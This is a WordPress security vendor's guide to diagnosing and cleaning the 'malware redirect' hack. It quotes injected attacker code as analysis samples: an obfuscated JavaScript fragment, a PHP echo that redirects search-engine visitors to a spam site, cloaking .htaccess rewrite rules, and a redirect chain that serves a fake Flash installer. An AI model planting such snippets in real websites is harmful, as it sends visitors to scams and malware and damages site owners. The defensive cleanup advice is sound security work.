WordPress Malware Redirect Hack 🔴 How To Fix It [2021 GUIDE]

Updated on

Fix WordPress Malware Redirect - site redirects visitors to spam site (Updated 2021)

Fixing WordPress Malware Redirect [Updated 2021]

WordPress website security and protection from malware or malicious code has become more important than ever in 2021. Its a well known fact that wordpress is used by more than 40% of websites. Estimated 64 million websites are currently using WordPress. Over 400 million people visit WordPress websites every month. Due to which WordPress hacking is on a rise in 2021.

According to Sucuri, WordPress malware infections saw a considerable increase from 83% to 90% in 2020-21.


Is your WordPress site redirecting to another website? You are a victim of famous redirect hack. In this article, we will provide you detailed info about WordPress malware redirect OR url redirect hack fix. We will show you how to fix hacked wordpress site redirecting to another site ‎🔴 . An Updated step-by-step guide to cleanup malicious redirects in WordPress site easily. (Video & Infographic Included) – Need Urgent Help.


It’s important to understand this hack so that you can do a cleanup of your website and also prevent it from reoccurring in future. In case you are short of time, we can fix your hacked wordpress & .

🔴 WordPress Site redirected to spam site?

Often, we come across people asking questions such as why my website is redirecting to another site or to multiple websites. A straight forward answer to website getting redirected is that your WordPress has been hacked and is infected with a malware which sends visitors to a spamy or phishing sites. Know more about WordPress Phishing in this post.

Intent behind inserting such malicious redirects can be black hat seo, or obtaining ad impressions. Attacker exploits vulnerabilities present in your wordpress site via a backdoor or malicious scripts which are hidden in source code. In some cases, it also throws a 404 page not found error for your wp-admin area.

This could be due to an infected wordpress plugin, malware injected .header.php and footer.php or .htaccess. We have seen many instances of such a hack where WordPress Site URL Redirects to Another Site and have fixed it successfully.

This can negatively impact your business in many ways.

  • These hackers may make out money, data and confidential information from your website. If in any case, your website is being redirected to phishing or malware websites then get ready for the consequences.
  • SEO loss – Yes, of course, Google is not going to take any chances with its reputation and you are definitely going to be penalized by Google maybe your WordPress site gets blacklisted in google. Google may also show “This Site May Be Hacked” warning message alongside your website listing in search results.
  • You host may suspend your website (Siteground suspension). You might get a message like  “this site has been suspended” OR Account suspended contact your hosting provider for more information
  • Breach of Privacy – It could result in data loss and breach of user privacy, in case, visitors download any software from that infected website unintentionally.
  • Branding – A visitor to your hacked site could be redirected to websites selling illegal or spam products which can harm your brand and customers will loose trust in your ecommerce website
  • Revenue Loss – If your website uses WordPress woocommerce for selling products, then it can lead to huge revenue loss as well as theft of sensitive information.

Is Your Site Infected With URL Redirect Malware !!! Let’s Find Out (Click Below)

WordPress Malware Scanner⭐️ What is WordPress Malware Redirect Hack?

website is being redirected to another malware site

WordPress Malware Redirect” or “WordPress Redirect Hack” is a kind of  🔴 exploit where infected site redirects the visitors to malicious website, phishing page and malware websites. It is likely due to the code injected in your WordPress database, that gets your WordPress site redirects to another site.

⭐️ WordPress Hacked Redirect – Signs, Types & Symptoms

You can easily make out that your wordpress is infected with a redirect malware. Look out for these signs and symptoms to diagnose your site for redirect malware.

  • Is your website redirects to another site
  • Is your WP-admin shows 404 error while logging in your dashboard
  • Are you are unable to access the website dashboard or front end
  • Are you unable to log in admin area of your website
  • Do you come across this error -““ERROR: There is no user registered with that email address” while logged in wp-admin.

WordPress Hacked Redirect_Types

In case you come across any of the above mentioned symptoms, get in touch with us right away. Our scanner will thoroughly analyze your website, find the location of the hack & start the removal process.

WordPress-Hacked-Malware-Redirect-Cleanup

Generally, a malicious WordPress Hacked Redirect is detected through the site’s front end when a visitor is redirected to any other page instead of the page or any website he requested. In most of the cases hackers use a particular malicious code to redirect the website to a porn or scam website to harm your website. Commonly used tricks includes:

  • Adding themselves as a ghost admin on your website
  • Injecting or uploading a malicious code in your WordPress site
  • Executing .php code

If any malicious script is added by hackers it’s often named to look like a legitimate file like that’s the part of WordPress core files on the website. Hackers can add malicious code to wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or wp-config.php file.

Also Read – 

⭐️ Instances Of Malicious Codes in WordPress Sites

examples of wordpress redirect hack

Site Redirect Chain – Redirecting from one site to another

We recently noticed that large number of wordpress sites have been redirecting to malware infected domains such as ibuyiiittraffic[.com] and i.cuttttraffic[.com]. In this kind of redirection malware site webmaster comes across a 404 error on his wp-admin. This is accomplished by infecting the website with backdoor hack or other means of malicious java-scripts being induced by SQL injection or CSS. This is an explicit example of malware redirection ‘chains’ where websites get automatically redirected multiple times before landing on the domain as desired by the attacker.

In other instances, it re-directs when you click anywhere on the page or click ALLOW.

site automatically redirects to another site

There are many instances found over net while doing a google search where we can see this kind of hack in action. In such cases, we can see that the initially a website redirects to clicks.xxfdftrafficx[.com],then to wwwx.xdsfdstraffic[.com] then to red.goabcdforward[.com], yellowlabel*****.[com] or ticker.*******records[.com] before landing on one of the sites.

Malware Redirection Chain in WordPress Websites

We did a google search to find of instances of such a redirection hack and got one site which was already infected in SERPS.

multiple wordpress site redirects to malware site

There are other instances where the redirected domain customizes itself according to the location of the user. For example, if a user is from another country, the malware page will translate itself to his native language. Same goes for other locations as well.

site-redirection-based-on-location

 

Other instances of presence of malicious codes, which resulted in random redirection of visitors to malicious sites on hacked WordPress sites decoded.

Javascript redirect

Malicious javascript malicious scripts can also be inserted into widgets by appending Obfuscated javascript to the files.

An attacker can add a few lines of javascript to some or all of the javascript files within the site’s files. A search of site files looking for the URL to which that the site is redirecting might not find any results because this javascript is often obfuscated. Here is an example:

var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x...

Plugin vulnerabilities (XSS) exploit

Vulnerabilities such as Stored Cross-site Scripting (XSS) in WordPress plugins make it possible for hackers to add malicious JavaScript code to your website. When hackers get to know that a plugin is vulnerable to XSS, they find all the sites that are using that plugin and try to hack it. Plugins such as contact form 7WordPress Ninja Forms, WordPress Yellow Pencil Plugin, Elementor pro & many others have been a target of such redirection hacks.

Header.php Injection

In general, the malicious code of 10 to 12 lines is inserted in header.php of the WordPress website.

 malware-code-decoded

When this is decoded the main part of the malware looks somewhat like this:

 site redirecting malware-code-decoded

There is a logic behind the code. It will simply redirect the visitors to default7.com if in case it’s the first visit then it can set 896diC9OFnqeAcKGN7fW cookie for 1 year approx. to track the returning visitors.

  • Malicious code inserted in footer
  • Malicious code inserted in themes header.php file

Malicious code

echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>

Depending on the browser and IP a user can be redirected to any random domain listed below

  • test0 .com
  • distinctfestive .com
  • default7 .com
  • ableoccassion .com
  • test246 .com
  • 404.php

Bugs in the Malware

There are various other effects of this malware that are somehow caused by few obvious bugs in the malicious code.

For example, see this line #9 in the decoded version

if ($_GET['6FoNxbvo73BHOjhxokW3'] !== NULL) {

For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter, generally can’t do anything if a GET requests contains it. It’s not a problem though. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:

Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()’d code on line 9

Malicious code in htaccess/wp-config.php files

In many cases, we have seen that attackers were hiding malicious code or files in the .htaccess file. These codes sometimes look exactly like legitimate codes. This makes it more difficult to identify and delete them. Besides inserting code into .htaccess files, codes can also be disguised in other WordPress core files like wp-config .php, wp-vcd, etc. to name a few.

The following image shows the hidden codes the security experts found on one of the clients’ sites.

Attacker can do changes in your htaccess file as it is a favorite location for attackers to place malicious redirect [Also Read – WordPress .htaccess hacked]. This file exists on your server and provides directives to server. It sends requests to server which further sends requests to wordpress primary index.php file to be handled. Often, these types of redirect chains (as seen in above examples) will make redirections based on the type of browser or device, or by the site that referred the visitor to your site (most often, from one of the search engines) A htaccess redirect can look like this:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android||meego|iphone|bada|bb\d+\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms

Below you can see an example of hacked htaccess file.

 infected htaccess file with redirect malware wordpress

Adding a phantom administrator

Once they land on your website by overcoming a vulnerability, they can add themselves as an administrator to the site. Now that they are dealing with the full power of the site, they are redirecting it to other illegal, obscene, or unverified domains.

Fake Updates for Internet Explorer Users

Users were also faced with a situation when using Internet Explorer. On Internet Explorer, the malware took users to websites that forced bogus Java updates and Flash updates. This link led to the download of the adobe_flash_player-31254524.exe file. Several security services reported that it was malware.

fake-adobe-flash-update-random redirects to malicious site

The strange case is when you use Internet Explorer the redirect chain may somewhat look like this:

default7 .com
-> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r=
-> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk.
-> intva31 .saturnlibrary .info/dl-pure/1202331/31254524/?bc=1202331&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202245&stub=true

This code leads to the websites that push fake java and flash player updates on your screen. see above attached screenshot for reference.

How to Detect and clean WordPress Malware Redirect Hack

⭐️ How to Detect and Fix WordPress Malware Redirect Hack?

Follow these steps to detect and remove malicious redirect hack in WordPress.

  • Before you start fixing WordPress malware redirect hack, ensure your website is temporarily put offline. By doing this you can have enough time to solve the problem and also prevent your users from visiting the hacked pages.
  • Always backup wordpress database before making any changes in the core files and the database of the website. The backup should also contain the hacked pages and can be be referred in case the necessary content is accidentally removed. Also, be sure  to keep a copy of all the files that you work with.
  • In case you have less knowledge about JavaScript, CMS or PHP files of your website, it’s strictly recommended to consult a professional to deal with the issue.

⭐️How To Find Malicious Code in WordPress?

There are different places where you can look for malware on your website. It’s not always an easy way to scan the code on every page of your website, piece by piece. Sometimes the culprit is locked away somewhere on your server.

Still, there are some places that the attackers primarily target. You will need the ftp / ftps login credentials to navigate to these locations and initiate the malware cleaning process.

If your website suddenly redirects to one or more anonymous websites, you should look at the following sections of the suspicious code:

  • Check Core WordPress Files
  • Check index.php
  • Check index.html
  • Check .htaccess file
  • Check theme files
  • Check header.php (in the themes folder)
  • Check footer.php (in the themes folder)
  • Check functions.php (in the themes folder)
  • Look for adminer script: look for a file named ‘adminer.php’
  • Locate this WordPress backdoor
  • Check for Fake or hidden admin users: Go to the wp_users table of the database and verify no unknown and unauthorized users are there. [ Also Read: Delete Hidden Admin User In WordPress ]
  • Check for both .js and .json files

NOTE: Always backup wordpress database before making any changes in the core files and the database of the website. Perhaps having a backup is the best thing. If you accidentally make a mistake while cleaning your site, your backup is considered safe.

Follow this simple 5-Step guide to cleanup malware from your hacked WordPress site which results in redirection to another spam site:

run a malware scanScanning Your WordPress Site

If you suspect that your website has been hacked with a malicious script, there are different ways to verify. However, before running them, you should generate a full backup of your website. Although your site can be hacked, there is still a possibility that the situation will get worse before it gets better.

There are various ways of checking your site and in any case you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While removing malware from wordpress site you might make any mistake and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using cutting-edge WordPress Vulnerability & Malware Scanners.

 wordpress malware scanner

Additional Tip: You may also try Google Diagnostic Page  tool to help you find out exactly which part of your website is infected and number of infected directories/files.

Additional Tip: Here are a many wordpress security scanners online that offer free malware scan. Here you can get a complete list of 60+ online wordpress vulnerabilty scanners & security tools.

  • Unmask Parasites: Helps you find out if your website has been hacked. This is a great first step in determining whether or not there is a problem.
  • Norton Safe Web: You can quickly find out if there are any threats to your website.
  • VirusTotal: One of the best online scanning websites available to scan your website or IP address for common viruses, malicious scripts, hidden doors, etc. It uses over 50 online antiviruses to get more accurate results.
  • Web Inspector: This website analyzes backdoors, injected scripts, malicious redirect codes with a fairly detailed report.

Scan My Server: Scans for malware, SQL injections, XSS, and more with a detailed report. The detailed report is emailed to you and takes approximately 24 hours.

Find Malicious redirect CodeMalicious Code in .PHP Files

There are number of places where you can locate the malicious code on your website. We understand it’s definitely not an easy task to scan the code chunk by chunk in each page of your website. There are times when the culprit can be enclosed somewhere in your server. And for few places you’ll need ftp/ftps login details to get access to these places to start the malware cleaning process.

website is redirecting

  • In case, the website is redirecting to an anonymous website(s), then look for the suspicious code in the following areas:

    • check both index.php and index.html!
    • .htaccess file
  • In case your website is triggering visitors for downloads, please have a look at out the following places:
    • Header.php
    • Footer.php
    • Your website’s index file (Check both)
    • Your theme’s files

Some of the most sensitive areas prone to infection are index.php, index.html, theme files, etc.

You can also look for malicious code with keywords like ‘eval’ or ‘eval base64_decode’. Apart from this, while performing a WordPress site hacked redirect, an attacker might also inject JS codes in files with .js extension.

PRO TIP: You can also compare the website code from the backup by using various code comparison tools e.g. diff checker or pretty diff to compare your plugin files with the original ones. For this, you have to download the exact same plugins from the WP repository and once installed you can start the code comparison to find out the differences. 

If the attacker has access to WP-ADMIN, he can modify the theme files via infected header.php. This can be avoided by adding the following code to wp-config.php file. It will disable the user’s ability to change PHP files via wp-admin.

define( ‘DISALLOW_FILE_EDIT’, true );

Then you need to update the theme, plugins and install all new major updates available. Make sure everything is as up to date as possible. This will reduce the vulnerabilities of your website.

Finally, change all passwords on your website. And I mean all! Not only the WordPress admin password, you also need to reset your FTP account passwords, regenerate WordPress salt keys, database (s), hosting and anything else related to your site.

 

Diagnose with googleUsing Google Search Console

At times there is no harm in running tests to analyze whether your website is infected with a malware/malicious code or not. For this, you can use any test to pretend you’re a user agent or Google bot using a googlebot simulator or you can also use FETCH AS GOOGLE from the website’s webmaster console. There are few commands that work through ssh client. By employing certain code you can look into that place where the hacking has been done and further WordPress malware removal can be done manually too. [📒 Also Read How to Scan & Detect Malware in WordPress Themes ]

UPDATE – GSC has been updated and the fetch as google tool was replaced by URL inspection tool as seen below:

fetch as google to detect malware in wordpress site

 

Remove URL search consoleRemoving Bad Code / Pages From Google

Firstly, You’ll need to remove the malicious scripts that causes website redirection to the abusive sites. Identify all the pages on your website with malicious code and remove them from search engine. These website pages can be removed from the Search Engine Results together by using the remove URLs feature and by going to Google Search Engine Console. Also, update the plugins, themes and ensure the new core theme is installed plus up-to-date. Change or reset the passwords, Regenerate WordPress Salt Keys using this tool.

Here are some WordPress security plugins that can detect infected files:

 

Request Removal search console

Malware reconsideration requestSubmit Malware reconsideration request in Google Search console

Google Webmaster tool is one of the best tool for webmaster which you can get for free, and if you have not yet submitted your Website in GWT, you are missing out many vital information regarding your website. Here I’m sharing step by step guide to put malware review request using Google Webmaster tool:

  • Login to Google search console
  • Verify your Website ownership
  • Click on Site > Dashboard > Security issue

Here you will see list of URL, google is suspecting that is infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on request a review, and add notes in the form of actions you have taken to remove the malware.

Malware-review-request-google-webmasters


Fixing WordPress MALWARE Redirect hack - 5 Steps

Helpful Video:

⭐️ How to Prevent malware redirect issue on WordPress site?

It’s important to secure your wordpress site in 2021 by following the guidelines listed below if you want to prevent redirect hack on your site in future:

  • Ensure your WordPress site core files are updated.
  • Keep your security keys updated – Read – WordPress Salts – Generate & Change Keys For Better Security
  • Use a safe Secure WordPress Hosting Service, that can manage your WordPress Site instead of just hosting it.
  • Go over your WordPress plugins and themes and make sure they have all been updated recently by their developers. Otherwise, you should look for alternatives and remove them from your WordPress site. Plugins and themes need to be updated – 📒 Read
  • Remove inactive themes or plugins that are not being used in your website.
  • Do not install nulled themes or plugins. – 📒 Read
  • Keep one or two admin accounts.
  • Review your push notifications on chrome.
  • Run an anti-virus scan on your computer
  • Clean browser cache & history
  • If you choose to use a reseller hosting account under another friendly WordPress hosting provider, avoid adding sites as add-ons under your main account. You can configure these sites in a separate site account.
  • Never install cracked themes or plugins.
  • Keep one or two admin accounts, demote the rest of your admin users to author or editor.
  • Remove all dev/demo configurations from your WordPress installation outside of your public directory

WordPress Malware Removal With WP Hacked Help

If you don’t have time or the expertise to scan and clean up WordPress Hacked Redirect then we can do it for you. This is a priority service that will restore your hacked WordPress site in a day or less. We take full WordPress database backup & scan your entire site to ensure all malware is deleted, and all infected and vulnerable files are replaced with fresh, secure copies.

Our WordPress Malware Removal service helps to remove all malware, WordPress backdoors, , and protection against common WordPress vulnerabilities.

Our Next Gen WordPress security services includes malware removal, hack recovery, WordPress hardening, WordPress updates, secure backups and much more.

Fix Hacked WordPress Website & Remove Malware -